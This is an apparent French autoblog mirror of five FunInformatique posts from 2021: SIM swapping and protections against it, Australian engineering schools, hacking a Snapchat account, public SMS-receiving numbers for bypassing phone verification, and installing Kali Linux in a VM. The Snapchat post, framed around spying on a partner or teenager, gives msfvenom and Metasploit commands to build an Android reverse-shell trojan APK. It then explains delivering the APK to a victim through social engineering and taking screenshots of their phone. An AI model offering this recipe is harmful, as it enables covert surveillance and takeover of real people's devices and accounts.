PROJET AUTOBLOG


FunInformatique

Site original : FunInformatique

⇐ retour index

SIM Swaping: pirater une carte SIM facilement

lundi 7 juin 2021 à 16:39

Saviez-vous que le vol de numéro de téléphone est possible ? En effet, les carte SIM peuvent être détournées pour obtenir un contrôle total sur le numéro de téléphone d’une autre personne.

C’est le principe de SIM Swaping ou l’échange de carte SIM en français.

Face à cette nouvelle menace, il est temps de voir ce qu’est le SIM Swaping, comment fonctionne cette attaque et comment s’en prémunir.

SIM Swaping, c’est quoi ?

Également connu sous le nom de détournement de carte SIM et de division de carte SIM, SIM Swaping est une attaque informatique qui consiste à se faire passer pour sa victime auprès de son opérateur de téléphonie mobile dans le but  de « voler » son numéro de téléphone portable.

Comment pirater une carte SIM ?

piratage carte SIM
Schéma de piratage carte SIM

Pour que l’attaque fonctionne, le cybercriminel collectera d’abord des informations sur la victime, souvent en parcourant le Web et en recherchant chaque bribe de données que la victime potentielle peut avoir (sur)partagée.

Les informations personnelles de la victime peuvent également être glanées à partir de violations ou de fuites de données connues, ou via des techniques d’ingénierie sociale, telles que le phishing, où le Footprinting.

Ensuite, le pirate informatique appelle tout simplement votre opérateur en se faisant passer pour vous. Il prétexte un problème de carte, de perte ou autre pour demander le transfert de votre numéro sur une nouvelle carte SIM, qu’il possède ou qu’il recevra simplement par la poste !

Mais comment fait-il pour convaincre le service client ?

En vérité, cela est assez simple, un peu d’aplomb, de psychologie et quelques infos personnelles sur vous suffisent pour pirater une carte SIM. Avec vos date de naissance, adresse et compte mail, cela est généralement suffisant pour obtenir beaucoup.

Une fois la nouvelle carte reçue, l’attaquant peut simplement l’insérer dans son téléphone et l’activer : cela a pour effet de désactiver l’ancienne carte, et offre aux attaquants la possibilité d’utiliser la nouvelle carte SIM pour réinitialiser l’accès à certains comptes ou encore contourner l’authentification multi-facteurs si celle ci passe par un SMS.

Qu’est-ce qui rend cette attaque si dangereuse ?

Déjà, le pirate va donc recevoir vos appels et SMS à votre place et même pouvoir répondre à vos contacts en se faisant passer pour vous. Cette attaque peut avoir des conséquences sur votre vie personnelle et professionnelle.

Si vous utilisez une synchronisation de vos contacts et échanges avec un compte en ligne, il peut même hacker ces derniers et accéder à vos historiques.

Un pirate peut aussi avoir accès à votre vie numérique sur les réseaux et outils de communication en ligne puisque beaucoup vous proposent d’utiliser votre numéro de téléphone comme identifiant secondaire et moyen de connexion d’urgence.

Le cofondateur de Twitter victime de SIM Swaping

Pendant l’été 2019, même le cofondateur de Twitter, Jack Dorsey, a été victime de piratage par échange de carte SIM ! Ses 4 millions d’abonnés ont découvert le 30 août des messages insultants et raciste publiés sur son propre compte Twitter. Cela, n’aura duré qu’un quart d’heure, mais cet “exploit” retentissant a révélé au grand public une menace qui existe depuis l’apparition des smartphones.

Pour réussir ce hack, Outre le SIM Swapping, les pirates de Chuckling Squad ont utilisé Cloudhopper, un service permettant de tweeter par SMS. Ce dernier vérifie que le SMS a bien été envoyé par le numéro de téléphone rattaché au compte Twitter avant de le publier sous forme de tweet.

Comment se protéger ?

Commencez par limiter les informations personnelles que vous partagez en ligne, évitez de publier votre nom complet, adresse, numéro de téléphone.

Une autre chose que vous devriez éviter est de trop partager des détails de votre vie personnelle : il est probable que vous en ayez inclus certains aspects dans vos questions de sécurité qui sont utilisées pour vérifier votre identité.

Ensuite, même s’il est recommandé d’utiliser la double authentification, mieux vaut désormais éviter celle qui repose sur l’envoi d’un SMS

Au lieu de cela, optez pour l’utilisation d’autres formes d’authentification à deux facteurs, telles qu’une application d’authentification installé sur votre mobile ou une clé USB d’authentification.

The post SIM Swaping: pirater une carte SIM facilement first appeared on FunInformatique.

Les 3 meilleures écoles d’ingénieurs informatique en Australie

vendredi 4 juin 2021 à 15:09

L’Australie attire depuis longtemps des étudiants du monde entier en raison de son excellent enseignement technique. Il accueille environ 800 000 étudiants chaque année.

Le pays offre non seulement d’excellents programmes de premier cycle et des cycles supérieurs en génie informatique, mais offre également une variété de diplômes de certificat dans le domaine par le biais de ses instituts TAFE .

Toutes les écoles d’Australie ont une excellente réputation et rayonnent au point de vue international. Cependant, parmi les nombreux  écoles du pays, 3 sortent du lot.

Dans cet article, je partage avec vous les 3 meilleures écoles d’ingénieurs d’Australie. En outre, je vais réponde à différentes questions sur les études en Australie. ,

Quel est le coût des études d’ingénierie en Australie ?

Les études en Australie ont un coût important pour les étudiants français. Et à moins d’être boursier, vous devez payer les frais de scolarité requis pour votre programme d’ingénierie informatique.

Plusieurs critères sont à prendre en compte pour estimer le coût de votre formation en Australie :

Ainsi, en tant qu’étudiant international, vos frais de scolarité sont généralement complets. Pour un baccalauréat, le nombre pourrait être compris entre 20 000 et 45 000 AUD par an. Et les frais de scolarité pour une maîtrise et de doctorat tournent environ 22 000 à 50 000 AUD par an.

Visas étudiants

Pour étudier en Australie, vous devrez obtenir un visa pour l’Australie. Pour cela, vous devez être en mesure de prouver au ministère de l’Intérieur que vous remplissez les principales conditions de visa d’étudiant australien.

De quel visa avez-vous besoin ?

Le visa dont vous avez besoin dépend du type d’études que vous souhaitez effectuer et de la durée de votre séjour en Australie. Vous pouvez en savoir plus sur chaque type de visa sur le site Web du ministère australien de l’Immigration et de la Protection des frontières (DIBP).

Mais en bref, vous aurez généralement besoin de :

Enfin, pour en savoir plus sur les détails du processus de visa étudiant et ce dont vous avez besoin pour entrer dans le pays, regardez cet article: conditions relatives au visa pour l’Australie.

3 meilleurs écoles d’ingénieurs informatique en Australie

Vous trouverez ci-dessous la liste des 3 meilleures écoles informatique qui non seulement se classent parmi les meilleures en Australie, mais ont également une réputation mondiale à leur actif.

Université de Melbourne

L’université de Melbourne est aujourd’hui la première université d’Australie selon les classements mondiaux. Elle est située à Melbourne, la capitale de l’État du Victoria en Australie. C’est la deuxième plus ancienne université d’Australie et la plus ancienne du Victoria.

Melbourne est connue pour offrir aux étudiants une expérience bien plus qu’un simple apprentissage structuré. En matière de technologie, les diplômés de Melbourne sont une force à prendre en compte.

Elle compte plus de 40 000 étudiants encadrés par près de 6 000 enseignants.

Visitez l’université de Melbourne

Université de Nouvelle-Galles du Sud

l’UNSW, fondée en 1949, est considérée comme l’une des meilleures universités australiennes pour ses centres de recherches et d’enseignement dans de nombreux domaines.

Elle a été développée dans le but de répondre aux nouvelles exigences de la technologie en pleine croissance.

Les diplômés de l’université sont très recherchés par les employeurs et leurs salaires de début de carrière sont plus élevés que la moyenne australienne.

Constamment classée comme la principale faculté d’ingénierie informatique en Australie, leur enseignement créatif et leur apprentissage pratique façonnent leurs diplômés en futurs leaders de l’ingénierie.

Visitez l’université

Université de Sydney

Fondée en 1850, l’Université de Sydney est est la plus ancienne université d’Australie.

C’est une université de recherche ouverte, connue pour être l’une des meilleures universités du monde. En outre, elle a reçu une charte royale de la reine Victoria en 1858. Après avoir reçu la charte royale, les diplômes délivrés par l’université ont été reconnus comme égaux à ceux délivrés par les universités du Royaume-Uni.

Visitez l’université de Sysdney

The post Les 3 meilleures écoles d’ingénieurs informatique en Australie first appeared on FunInformatique.

Comment pirater un compte Snapchat ?

lundi 31 mai 2021 à 20:46

Comment pirater Snapchat ? Voici une question que la plupart des utilisateurs de Snapchat se posent. Comment pirater un compte Snapchat pour savoir si mon conjoint est infidèle ? Comment pirater le compte Snapchat de mon ados pour contrôler ce que fait sur son smartphone ?

Bref, tout le monde à une bonne excuse de vouloir pirater un compte Snapchat.

La première chose que fait l’internaute, c’est généralement d’essayer de trouver la réponse en faisant une recherche Google.

Devinez quoi ? Et bien, sur toute la première page de résultat, on trouve une grande liste d’arnaqueurs qui promettent de récupérer des vidéos, des photos et des journaux de chat de n’importe quel compte Snapchat.

Un site frauduleux

Il y a des tas d’arnaques en tout genre sur la première page Google. Mais, désolé de vous dire que ces sites vous donne de faux espoirs.

Tous ces programmes sont créés dans le but de récupérer votre mot passe Snapchat, ou pour voler votre argent ou encore pour prendre le contrôle de votre smartphone.

Alors comment pirater un compte Snapchat ?

Un programme de piratage direct n’existe pas. En aucun cas, il n’y aura un miracle qui vous fera pirater une personne en deux minutes.

Cependant, il est impossible de garantir une sécurité à 100 %.  N’importe quel système peut être piraté.

Donc pour vraiment pirater un compte Snapchat, il faut être patient et intelligent. Si vous voulez des outils spécialisés, vous pouvez par exemple vous orienter vers la distribution Kali Linux.

Pirater un Snapchat avec l’outil Metasploit

Remarque: Cet article est à but éducatif et préventif uniquement. Apprendre l’attaque pour mieux se protéger. Vous êtes le seul(e) responsable de vos actions, et aucune responsabilité de la part de l’instructeur ne sera engagée quant à la mauvaise utilisation du contenu enseigné.

Cette technique consiste a exploiter les failles du système Android, iOS ou des applications installés dedans.

Chaque jour, des nouvelles failles de sécurité sont découverte sur les systèmes Android et iOS. Ces failles sont exploitable et permettent ainsi à une personne de prendre le contrôle total d’un smartphone ou d’une tablette.

Pour exploiter ces failles, un pirate crée une fausse application Android malveillante et l’envoie à une victime. Une fois l’application est installée sur le smartphone de la victime, il est facile de prendre le contrôlé de son smartphone et pirater son compte Snapchat.

Pour cela, les pirates utilisent l’outil Metasploit disponible sur la distribution Linux Kali linux.

Metasploit, c’est quoi ?

Metasploit est un outil qui permet le développement et l’exécution d’exploits contre un appareil distante. Il contient des centaines d’exploits et permettront d’attaquer tout type de machines connecté à internet.

Si vous voulez tester cette méthode sur votre téléphone et vous avez un ordinateur sous Windows alors je vous conseille créer une machine virtuel faisant tourner Kali Linux. Pour cela, il suffit de télécharger VMware et une image de Kali Linux. Metasploit est déjà pré-installé dessus.

Pour plus détails, regardez ce tutoriel: comment installer Kali Linux sur une machine Windows.

Commandes Linux pour pirater Snapchat

Création de l’application Backdoor.apk

Apres l’installation de Kali Linux sur votre machine, ouvrez le terminal Kali Linux. Ensuite, nous allons créé le trojan APK (c’est l’application que nous allons envoyer à la cible).

Pour cela, tapez la commande suivante:

msfvenom -p android / meterpreter / reverse_tcp lhost = 192.168.1.4 lport = 4000> /home/backdoor.apk

et appuyez sur Entrée. Cela créera un l’application APK backdoor.apk dans le dossier.

N’oubliez pas de replacer LHOST avec votre propre adresse IP.

Backdoor.apk est l’apk de piratage qui sera utilisé pour pirater le compte Snapchat d’une victime. Elle doit être installé sur le téléphone Android de la victime.

Vous pouvez envoyer ce fichier en utilisant divers sites Web de partage de fichiers comme Wetransfer (ce site Web ne nécessite pas d’enregistrement d’utilisateur).

Enfin, vous trouverez le backdoor.apk dans le répertoire Home.

Configuration de l’application Backdoor.apk

Maintenant, il faut configurer cette application Backdoor.apk. Pour cela, nous allons ouvrir un autre terminal et lancer l’outil Metasploit.

Ensuite, tapez les commandes suivantes:

msfconsole (permet d’ouvrir l’outil métasploit)
use /multi/handler (permet de sélectionner l’exploit handler)
set payload android/meterpreter/reverse_tcp
set lhost votre_adresse_ip
exploit

Voila le module est bien configuré, il reste maintenant d’envoyer l’APK à une victime en utilisant l’ingénierie sociale. Lorsque la victime installera l’application sur son mobile, Metasploit vous indiquera quelque chose comme ceci :

Il ne nous reste plus qu’à ouvrir une session Meterpreter à distance sur le mobile de la victime :

msf > sessions -i 1
[*] Starting interaction with 1…

Nous avons désormais le contrôle total du smartphone.  Par exemple : nous pouvons faire des captures d’écran de à distance de l’application Snapchat:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot snapchat.jpg

Conclusion

Pirater un compte Snapchat, n’est pas du tout une chose facile. Cette technique n’est pas fiable à 100%. Si la cible est bien protégé, vous n’aurez rien a faire.
J’espère qu’a travers ce tutoriel, vous avez bien compris comment fonctionne le piratage des applications Android ou iOS comme Snapchat.

Si vous avez des ajouts pour rendre cette page une base de donnée concernant Snapchat, n’hésitez pas à poster votre commentaire !

The post Comment pirater un compte Snapchat ? first appeared on FunInformatique.

Contourner la vérification par SMS sur n’importe quel site

lundi 31 mai 2021 à 16:03

De nos jours, plusieurs sites sur le Web, nous demandent de leurs indiquer notre numéro de téléphone pour confirmer notre identité et pour compléter une simple inscription. Mais voilà, donner son vrai numéro de téléphone à des inconnu, peut poser quelques problèmes de vie privée.

Alors pourquoi utilisent-ils ce système qui nous oblige à délivre notre numéro de téléphone mobile ?

Bref, je ne sais rien. Par contre, je sais qu’il existe une parade à ça. Plutôt que de donner impunément votre numéro mobile, il existe une astuce pour contourner cette vérification par SMS.

Recourir à quelques services sur le web qui vous offrent des numéros de téléphones sur lesquels vous pouvez recevoir vos messages SMS.

Parmi ces services, je partage avec vous trois adresse que j’utilise personnellement :

Receive-smss

Receive-smss.com est un service gratuit de réception de SMS et de messages vocaux en ligne. Il n’est pas nécessaire de s’enregistrer. Sélectionnez simplement un numéro de téléphone dans la liste. Vous pouvez l’utiliser pour recevoir des messages de Facebook, Telegram, WeChat, VK, PayPal, AliPay et plus.

Accéder à receive-smss.com

GetFreesmsNumber

GetFreeSMSNumber.com est un service Gratuit pour recevoir des messages SMS temporaires et des messages vocaux en ligne.

Visitez getfreesmsnumber.com

SMS-Receive.net

SMS-Receive.net est un site Web qui contient des numéros de téléphone virtuels et des numéros de téléphone réels stockés sur les cartes SIM.

Le site Web fournit aux utilisateurs un service gratuit avec des numéros de téléphone publics où vous pouvez recevoir des SMS en ligne sur divers sites Web sociaux ou forums tels que: NAVERLINE, Yahoo , Microsoft, serverloft , CloudSigma, Facebook , Amazon, VK , OKru, Instagram , RealStatus etc.

Il est possible de confirmer votre inscription en utilisant ces numéros.

N’oubliez pas que tous les messages reçus sur ce service seront visibles par tous les visiteurs et ne pourront pas être supprimés.

contourner_sms-verification

L’avantage de SMS-Receive.net, c’est qu’il propose de nombreux numéros de tél, qui appartiennent à différents pays, très utile en cas de restriction que met en place certains sites web.

Accéder à SMS-Receive.net 

Comment contourner la vérification par SMS ?

verfication-sms

The post Contourner la vérification par SMS sur n’importe quel site first appeared on FunInformatique.

Comment installer Kali Linux sur Windows ? (Pour les débutants)

vendredi 28 mai 2021 à 18:14

Comme vous le savez, de temps à autres je partage avec vous des tutoriels sur l’Ethical Hacking. Dans ces tutoriels, je travaille souvent avec la distribution Kali Linux successeur de Backtrack.

Cependant, je me suis rendu compte que plusieurs de mes lecteurs ne savent pas encore comment installer Kali Linux sur leur machine tout en laissant Windows intact.

Aujourd’hui, j’ai décidé de rédiger un tutoriel sur comment installer Kali Linux sur votre machine Windows en utilisant le programme VirtualBox ou VMWare.

Comment vous le savez déjà, Kali Linux est le meilleur système d’exploitation pour les tests de pénétration. L’objectif de Kali Linux est de fournir une distribution regroupant l’ensemble des outils nécessaires aux tests de sécurité d’un système d’information.

Et VirtualBox et Vmware player sont des programmes qui utilisent la virtualisation. C’est une technique qui permet la création d’une ou plusieurs machines virtuelles au sein d’un même système d’exploitation (généralement Windows).

Il est possible de faire fonctionner plusieurs machines virtuelles en même temps, la limite correspondant aux performances de l’ordinateur hôte.

Installer Kali Linux sous Windows 10 et Windows 7 avec VirtualBox

Dans cette vidéo, je vais vous montrer comment installer Kali Linux avec Virtualbox sous Windows: étape par étape. Ceci est un guide détaillé sur l’installation de Kali Linux sur VirtualBox.

 

Créer une machine virtuelle Kali Linux sur Windows avec Vmware

Ici, nous allons voir comment installer Kali Linux sur votre système Windows avec le logiciel VMWare.

Etape 1:

Commencez par télécharger Vmware. VMWare player est gratuit mais pas libre, vous devrez quand même vous enregistrer pour générer une clé d’activation qui vous sera demandée lors de l’installation.

Ensuite télécharger le fichier ISO de kali linux. Le fichier occupe plus de 3 Go. On enregistre le fichier qui pourra être réutilisé dans un répertoire spécial nommé “Image disque” par exemple.

Une fois téléchargé Vmware, lancer l’installation en double cliquant sur l’exécutable. Continuer les étapes en cliquant sur Next Next, Finish. Vmware Player est désormais installé sur votre ordinateur. Ouvrez Vmware et cliquez sur “Create New Virtual Machine”.

Etape 2:

Sélectionnez “Installer disc image file (iso)”, ensuite sélectionnez le fichier ISO de kali linux que vous avez téléchargé. Cliquez sur “Next”.

Etape 3:

Dans cet étape, sélectionnez le type de système d’exploitation à installer puis entrez le nom de la machine virtuelle. Dans mon cas, je vais le nommer “Funinformatique Kali Linux”. Choisissez aussi la location, je vous recommande de créer un dossier nommé “Virtual machines” dans mes Documents. Ensuite cliquez sur Next.

Etape 4:
Après il faut sélectionnez la taille maximum de l’espace de stockage que vous souhaitez utiliser pour kali linux. Je recommande d’utiliser 30 GB. Apres changer l’option suivante à “Store virtual disk as a single file” et cliquez sur Next.

Etape 5:

Dans la fenêtre suivante, il faut configurer le matériel virtuelle que nous allons utilisé dans Kali linux. Donc cliquez sur le bouton “the Customize Hardware.

Kali-linux6

Sélectionnez “Memory”, et choisissez la taille de mémoire que vous souhaitez donner au système kali linux. Pour moi, comme je dispose 4 go dans mon ordinateur, je vais choisir 2 GB’s (2048 Mb’s).

Cliquez ensuite sur Network Adapter. Dans cette partie, nous allons a dire à Vmware d’utiliser la carte wifi de notre ordinateur.

Pour cela, sélectionner l’option Bridged et cliquez sur le bouton “Configure Adapters”.
Dans la nouvelle fenêtre, désélectionner tout sauf votre carte réseau WIFI et cliquez sur OK. Vous pouvez maintenant cliquer sur Fermer au bas de la fenêtre du matériel et cliquez sur Terminer.

Etape 6:

Félicitation ! Le nouveau fichier de machine virtuelle est maintenant bien configuré et il est ajouté à la bibliothèque VM.

Maintenant tout ce que vous reste à faire est démarrer votre machine virtuelle! Pour cela, cliquez sur le nom de la machine virtuelle nouvellement créée, puis cliquez sur Play virtual machine.

Apres le démarrage de votre machine virtuelle, vous aurez deux possibilités: soit lancer le système linux en live, soit l’installer sur le disque dur de la machine virtuelle.

Le mode live a la particularité de pouvoir lancer un système Linux sans installation sur le disque dur. L’avantage de  mode live c’est qu’il vous permet de tester le système avant de l’installer.

Son inconvénient, c’est qu’il n’est généralement pas possible de sauvegarder directement les modifications effectuées en cours de session. C’est a dire une fois que vous arrêter le système tous les document crées et les logiciels que vous auriez installer seront perdu.

Donc il est préférable de l’installer sur votre machine virtuelle.

Comment installer kali linux sous VMWARE ?

Etape 1:

Dans le boot menu de kali Linux, choisissez l’option “Graphic install” et cliquez sur Entrer. Dans la fenêtre suivant, il vous sera demandé de choisir la langue du système.

Etape 2:

Ensuite choisissez votre situation géographique. Apres il faut choisir la langue de votre clavier. Cliquer sur suivant, attendez quelques secondes, le temps que kali linux détecte le matériel de votre ordinateur. Ensuite vous auriez une fenêtre qui vous demande d’entrer le nom de votre machine. Entrez le nom qui vous convient le mieux/

Etape 3:

Kali Linux va maintenant vous demander d’entrer un mot de passe pour l’utilisateur root. Assurez-vous que vous pouvez facilement vous rappelez de ce mot de passe, si vous l’oubliez, vous devrez réinstaller Kali Linux. Cliquez sur continuer après que vous avez entré et ré-entré le mot de passe de votre choix.

Etape 4:
Ici, sélectionner l’option “Assisté – utiliser un disque entier” et cliquez sur continuer. Une autre fenêtre vous demandera de confirmer votre choix. Cliquez sur continuer.

Etape 5:

Ensuite sélectionner la première option “Tout dans une seule partition “. Cliquez sur continuer. Une autre fenêtre vous demandera de confirmer votre choix. Cliquez encore sur continuer.

Etape 6:

Dernière question! Confirmez que vous voulez vraiment faire ces changements en sélectionnant l’option Oui et en cliquant sur Continuer.

L’installation de Kali linux va maintenant commencer. En moyenne, l’installation prend 30 min.

Après quelques minutes, l’installateur vous demandera si vous souhaitez installer le chargeur de démarrage GRUB. Cliquez sur Oui et continuer. Enfin sélectionner dev/sda et cliquez sur continuer.

 Après le redémarrage, entrez le login (root) et le mot de passe.

Vous voilà avec Kali sur une machine virtuelle, prêts à tester vos réseaux.

The post Comment installer Kali Linux sur Windows ? (Pour les débutants) first appeared on FunInformatique.